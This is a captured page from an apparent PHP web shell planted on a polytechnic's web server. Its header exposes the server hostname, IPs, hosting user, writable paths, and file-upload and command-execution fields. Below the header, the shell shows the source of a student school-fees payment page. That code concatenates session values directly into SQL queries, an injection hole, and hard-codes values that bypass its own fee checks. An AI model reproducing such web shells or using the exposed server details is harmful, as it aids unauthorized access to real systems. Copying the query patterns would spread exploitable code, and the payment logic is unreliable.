403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.50.62
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_student/index_pay_OlevelAddbbb.php
<?php
ob_start();
include('headMain.php');
?>
<div id="wrapper">
    <script type="text/javascript" language="javascript" src="../js/jquery-1.7.1.js"></script>
    <script type="text/javascript" language="javascript" >
        $(function(){
            $("#olevel").change(function(){
                ($("#olevel").val());
                $.post("../js/getolevel.php",{olevel:$("#olevel").val()},function(data){
                    $("#amt_total").val(data);
                    //$("#amt").val(data);
                });
            });

            $("#paymentMode").change(function(){
                // ($("#paymentMode").val());
                $.post("../js/getPartPayment.php",{paymentMode:$("#paymentMode").val()},function(data){
                    //	alert (data);
                    $("#trow").html(data);
                });
            });
        });
    </script>
    <table width="100%" align="center" cellpadding="3" cellspacing="5">
        <tr>
            <td><fieldset>
                    <form id="form1" name="form1" method="post" action="postjson_schoolFeesbbb.php" role="form">
                        <fieldset>
                            <legend>
                                <div class="row">
                                    <div class="col-lg-3"></div>
                                    <div class="col-lg-6">
                                        <div class="panel panel-default">
                                            <div class="panel-heading">
                                                School Fees Payment (<?php echo $_SESSION['matNo'] ;?>)
                                            </div>
                                            <div class="panel-body">

                                                <div class="row">
                                                    <div class="col-lg-12">
                                                        <form role="form">

                                                            <table width="100%" cellspacing="5" cellpadding="3">
                                                                <?php
                                                                $_SESSION['ptype']='School Fees';
                                                                $matno= $_SESSION['matNo'];
                                                                $levelID=$_SESSION['levelID'];
                                                                $course= $_SESSION['course'];
                                                                // echo '<font color="#FF0000"><h3> Click on "Make Other Payment" to pay Late Registration Penalty</h3></font>';
                                                                //deptID
                                                                $_SESSION['deptID']=0;
                                                                $res=$db->query("select * from dept where dOption='$course'");
                                                                $res_fetch=$res->fetch(PDO::FETCH_BOTH);
                                                                $n=$res->rowCount();
                                                                if ($n>0){
                                                                    $deptID=$_SESSION['deptID']=$res_fetch['sn'];
                                                                }
                                                                $sql_current=$db->query("select * from current where sn=2");
                                                                $sql_current_fetch=$sql_current->fetch(PDO::FETCH_BOTH);
                                                                $num_current=$sql_current->rowCount();
                                                                if ($num_current>0){
                                                                    $semester=$_SESSION['asemester']=$sql_current_fetch['asemester'];
                                                                    $asession=$_SESSION['asession']=$sql_current_fetch['asession'];
                                                                }
                                                                //End
                                                                $sdouble=$db->query("select * from realdata where formNo='$matno' and fresher='2'");
                                                                $sdouble_fetch=$sdouble->fetch(PDO::FETCH_BOTH);
                                                                $rdouble=$sdouble->rowCount();
                                                                if ($rdouble>0){
                                                                    $matno=$sdouble_fetch['matNo'];
                                                                    $_SESSION['matNo']=$matno;
                                                                }
                                                                $query=$db->query("select * from remitaorder where `regNo`='$matno' and paymentType='School Fees' and transApproved='True' and pay_session='$asession' and status<>'Re-fund'");
                                                                $q_num=$query->rowCount();
                                                                $q_num=0;
                                                                if ($q_num>0){
                                                                    echo "School Fees Has Not Been Made, Proceed to School Fees payment";
                                                                }else{
                                                                    //check status repeater
                                                                    $checkRemark="select * from rawcgpa where matNo='$matno' and `remark` LIKE 'REPE%'";
                                                                    $resultRemark=$db->query($checkRemark);
                                                                    $numRemark=$resultRemark->rowCount();
                                                                    if ($numRemark>0){
                                                                        $remark='Repeater';
                                                                        $_SESSION['repeater']=$remark;
                                                                        //$levelID=$levelID-1;
                                                                    }else{
                                                                        $checkFresher="select * from admitted where formNo='$matno'";
                                                                        $resultFresher=$db->query($checkFresher);
                                                                        $resultFresher_fetch=$resultFresher->fetch(PDO::FETCH_BOTH);
                                                                        $numFresher=$resultFresher->rowCount();
                                                                        if ($numFresher>0){
                                                                            $remark=$resultFresher_fetch['status'];
                                                                        }else{
                                                                            $remark='Normal';
                                                                        }
                                                                    }
                                                                    $k=$db->query("select * from realdata where matNo='$matno' and `status`='Deferment'");
                                                                    $deferment=$k->rowCount();
                                                                    if ($deferment=='1'){
                                                                        $remark='Repeater';
                                                                        $_SESSION['repeater']=$remark;
                                                                    }
                                                                    if (($levelID=='6') and ($remark=='Repeater')){
                                                                        $remark='Normal';
                                                                    }
                                                                    //End status
                                                                   // echo $asession;
                                                                    $checkAmount="select * from schoolfee where dept='$deptID' and level='$levelID' and status='$remark' and asession='$asession'" ;
                                                                    $resultAmount=$db->query($checkAmount);
                                                                    $resultAmount_fetch=$resultAmount->fetch(PDO::FETCH_BOTH);
                                                                      $numAmount=$resultAmount->rowCount();
//                                                                    die($numAmount);
                                                                    if ($numAmount>0){
                                                                        //echo $remark;
                                                                        $amount=$_SESSION['amount']= 2500;//+5000;
                                                                        $_SESSION['amount1']=0;
                                                                        ?>
                                                                        <tr>
                                                                            <td><h3 style="color: red">Note: All New Students i.e. ND 1 FT, ND 1 DPT, ND PT YR 1, HND 1 must get Eligibility Form signed by their HOD before payment.</h3></td>
                                                                        </tr>
                                                                        <tr>
                                                                            <td colspan="3"><b><h3> Amount Expected: <?php echo $amount; ?></h3></b></td>
                                                                        </tr>
                                                                        <tr>
                                                                            <td colspan="3"><table width="100%" align="center">
                                                                                    <tbody>
                                                                                    <tr>
                                                                                        <td width="60%">Payer Name:</td>
                                                                                        <td><input name="payerName" type="text" value="<?php echo $_SESSION['names'];?>" size="45" readonly="readonly"  id="txtRound"class="form-control"/></td>
                                                                                    </tr>
                                                                                    <tr>
                                                                                        <td width="200">Payer Email: <font color="red">*</font></td>
                                                                                        <td><input name="payerEmail" required="required" value="" type="email" id="txtRound" class="form-control" /></td>
                                                                                    </tr>

                                                                                    <tr>
                                                                                        <td width="200">Payer Phone:</td>
                                                                                        <td><input name="payerPhone" required="required" value="" type="text" id="txtRound" class="form-control" /></td>
                                                                                    </tr>
                                                                                    <?php
                                                                                    //}
                                                                                    $b=$db->query("select * from realdata where matNo='$matno' and fresher='90'");
                                                                                    $olevelCheck=$b->rowCount();
                                                                                    if ($olevelCheck>0){
                                                                                        ?>
                                                                                        <tr>
                                                                                            <td>No. of O'level</td>
                                                                                            <td><label for="paymentMode"></label>
                                                                                                <select name="olevel" id="olevel" class="form-control">
<!--                                                                                                    <option value="0">1</option>-->
                                                                                                    <option value="2500">2</option>
                                                                                                </select></td>
                                                                                        </tr>
                                                                                    <?php
                                                                                    }
                                                                                    ?>
                                                                                    <tr>
                                                                                        <td width="200">
                                                                                            Amount:  </td>
                                                                                        <td ><input name="amt" type="text" required="required"  value="2500" readonly="readonly" id="amt" class="form-control" /></td>
                                                                                    </tr>
                                                                                    <tr>
                                                                                        <td width="200">
                                                                                            Charges:  </td>
                                                                                        <td ><input name="amt_charge" type="text" required="required"  value="0" readonly="readonly" id="amt_charge" class="form-control" /></td>
                                                                                    </tr>

                                                                                    <tr>
                                                                                        <td width="200">
                                                                                            Total Amount:  </td>
                                                                                        <td ><input name="amt_total" type="text" required="required"  value="<?php echo $amount;?>" readonly="readonly" id="amt_total" class="form-control" /></td>
                                                                                    </tr>
                                                                                    <tr>
                                                                                        <td><p></p></td>
                                                                                    </tr>
                                                                                    <tr>
                                                                                        <td colspan="2" align="center"><p><input type ="submit" name="input" value="Pay" id="button"  class="btn btn-primary form-control"/>  <table width="50%" cellspacing="5" cellpadding="3">

                                                                                            </table>
                                                                                           <!-- <img src="../images/remitaLogo.jpg" alt="" width="418" height="90" />-->
                                                                                            <p><?php echo' <br /><a href="paymentHistory.php"> Click to check Payment History</a>';?></td>
                                                                                    </tr>
                                                                                    </tbody>
                                                                                </table></td>
                                                                        </tr>
                                                                        <tr>
                                                                            <td colspan="3">&nbsp;</td>
                                                                        </tr>
                                                                    <?php }else {
                                                                        ?>
                                                                        <tr>
                                                                            <td>&nbsp;</td>
                                                                            <td>&nbsp;</td>
                                                                            <td><b>
                                                                                    <h3 style="color: blue"> Amount Expected: 0</h3></b></td>
                                                                        </tr>

                                                                    <?php
                                                                    }
                                                                }
                                                                ?>
                                                            </table>
                                                        </form>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </legend>
                        </fieldset>
                    </form>
                </fieldset>
            </td>
        </tr>
    </table>

    <?php
    include('footMain.php');
    ob_end_flush();
    ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit